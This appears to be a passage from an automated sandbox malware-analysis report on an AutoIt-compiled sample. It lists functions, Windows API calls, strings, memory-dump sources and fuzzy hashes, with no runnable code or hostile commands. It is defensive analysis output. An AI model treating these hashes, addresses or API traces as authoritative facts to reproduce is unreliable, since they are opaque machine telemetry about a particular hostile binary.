                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __ctrlfp$__umatherr
                                                                                                                                                                  • String ID: xn%
                                                                                                                                                                  • API String ID: 219961500-366572180
                                                                                                                                                                  • Opcode ID: a4ab5db192f78187eb9aad542cb2862260585b93bee01e65a8730a3f57c7fb1d
                                                                                                                                                                  • Instruction ID: 09cffb7dcd69b505eac1f043e9f0cd0e64fb0f75b2f66e7dcb4674a219a223f8
                                                                                                                                                                  • Opcode Fuzzy Hash: a4ab5db192f78187eb9aad542cb2862260585b93bee01e65a8730a3f57c7fb1d
                                                                                                                                                                  • Instruction Fuzzy Hash: E8E06D7244870EEADB027F90F9066AA3BA5EF04310F808095F98C140D7DFB284B49B57
                                                                                                                                                                  Function 0021B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0021B36B
                                                                                                                                                                    • Part of subcall function 00202011: _doexit.LIBCMT ref: 0020201B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message_doexit
                                                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                                                                  • Opcode ID: cbd02f16e98749b269c4179d99ecc58ea3b9503c54bf6355e56d83b6eb67c3cc
                                                                                                                                                                  • Instruction ID: 6c2cb76ce94be49154c46711ed951bab9ea6dd8e7774bfe7d5a5857e3b75d464
                                                                                                                                                                  • Opcode Fuzzy Hash: cbd02f16e98749b269c4179d99ecc58ea3b9503c54bf6355e56d83b6eb67c3cc
                                                                                                                                                                  • Instruction Fuzzy Hash: 85D0123139535832E21536A67C0BFC9B6984F15B51F104056FF0C651D28AD1A4F04199
                                                                                                                                                                  Function 0025BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 0025BAB8
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0025BCAB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                                  • String ID: WIN_XPe
                                                                                                                                                                  • API String ID: 510247158-3257408948
                                                                                                                                                                  • Opcode ID: ab62527b955e8f3e181ce070d30ad29af462e5dd3612acc0b8fa1ec4bfa18119
                                                                                                                                                                  • Instruction ID: fcfe76d144e66e4a45d454f6d39b66c0425f63639266a200c74059f5c1d51da7
                                                                                                                                                                  • Opcode Fuzzy Hash: ab62527b955e8f3e181ce070d30ad29af462e5dd3612acc0b8fa1ec4bfa18119
                                                                                                                                                                  • Instruction Fuzzy Hash: DEE0C970D2410DEFCB16DBA9D849AEDB7B8BB09301F14C496E922B2051C7B19A58DF25
                                                                                                                                                                  Function 00248495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0024849F
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002484B2
                                                                                                                                                                    • Part of subcall function 00228355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002283CD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                  • Opcode ID: 48d7cbe8bbfc49e4e118a05daee031756c0572d7f04fdeff622895b21b2a783a
                                                                                                                                                                  • Instruction ID: ece6607af5462d30fc883e8c128066f3e76a6954dd5f52395e89598276fcde00
                                                                                                                                                                  • Opcode Fuzzy Hash: 48d7cbe8bbfc49e4e118a05daee031756c0572d7f04fdeff622895b21b2a783a
                                                                                                                                                                  • Instruction Fuzzy Hash: 94D02233798318B7EB20E770FC4FFC3AA48AB18B00F000828F309AA1C0C8E0B800C620
                                                                                                                                                                  Function 002484C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002484DF
                                                                                                                                                                  • PostMessageW.USER32(00000000), ref: 002484E6
                                                                                                                                                                    • Part of subcall function 00228355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002283CD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                  • Opcode ID: f712da824ac27972e7b8dc4f33f2b70aedd83659eab05b77c3a5e48a5e043c16
                                                                                                                                                                  • Instruction ID: b8b9bec7183b8b2d9ef89984666d8c5dda0327821b9d0ed7060656f1cfcd2d51
                                                                                                                                                                  • Opcode Fuzzy Hash: f712da824ac27972e7b8dc4f33f2b70aedd83659eab05b77c3a5e48a5e043c16
                                                                                                                                                                  • Instruction Fuzzy Hash: 41D0A9337843187BEA21A770BC4FFC3A648AB18B00F000828B309AA1C0C8E0B800C624
                                                                                                                                                                  Function 0022D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0022D01E
                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0022D035
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                                                  • String ID: aut
                                                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                                                  • Opcode ID: 8fb10f1ec8a6c451ef948c91b154e08d06625f0e6bf739b5cedb251fd255501d
                                                                                                                                                                  • Instruction ID: a31d5440dd4e3f9874767c22efc85830f737595e9114e922dc32b0c79ebf8372
                                                                                                                                                                  • Opcode Fuzzy Hash: 8fb10f1ec8a6c451ef948c91b154e08d06625f0e6bf739b5cedb251fd255501d
                                                                                                                                                                  • Instruction Fuzzy Hash: 65D05EB1A4030EBBDB10ABA0ED0EF99776CA704704F108190BA15D10D2D2F0D6558BA0